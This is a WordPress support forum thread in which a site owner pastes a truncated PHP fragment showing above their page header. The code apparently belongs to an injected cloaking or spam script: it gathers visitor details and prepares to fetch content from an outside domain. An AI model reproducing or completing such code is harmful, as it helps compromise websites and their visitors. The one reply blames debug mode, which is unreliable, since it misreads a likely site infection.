• error_reporting(0); header('Content-Type: text/html; charset=utf-8'); $OoooOO0 = 'bfivenew'; date_default_timezone_set('PRC'); $dRoot = @$_SERVER['DOCUMENT_ROOT']; $rUrl = @$_SERVER['REQUEST_URI']; $curName = @basename(__FILE__); $sName = @$_SERVER['HTTP_HOST']; $Ooolg = @$_SERVER['HTTP_ACCEPT_LANGUAGE']; $uAgent = @$_SERVER['HTTP_USER_AGENT']; $referer = @$_SERVER['HTTP_REFERER']; $http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://'; $typeName = $http_type . $sName; $uAgent = @strtolower($uAgent); $referer = @strtolower($referer); if(getenv('HTTP_CLIENT_IP')){ $client_ip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR')) { $client_ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR')) { $client_ip = getenv('REMOTE_ADDR'); } else { $client_ip = $_SERVER['REMOTE_ADDR']; } $siteweb = "gwallergy.xyz"; function getCurl($gurl) { $file_contents = ''; $user_agent = 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)'; if(function_exists('curl_init')){ try { ?>

    This code keeps showing up on top of my header i have looked a lot a don know what to do.

    • This topic was modified 2 years, 7 months ago by Jan Dembowski. Reason: Moved to Fixing WordPress, this is not an Everything else WordPress topic

    The page I need help with: [log in to see the link]

Viewing 2 replies - 1 through 2 (of 2 total)
  • Is your Debug Mode active?
    You can find that in wp-config.php at root.

    define(‘WP_DEBUG’, true);

    If so, just turn it of by typing “false” where “true” is.

    Thread Starter theprimenterprise

    (@theprimenterprise)

    Thanks for you help and sorry for the late reply but the Debug mode is already “false”, what should I do now??

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Code appearing on top of Header’ is closed to new replies.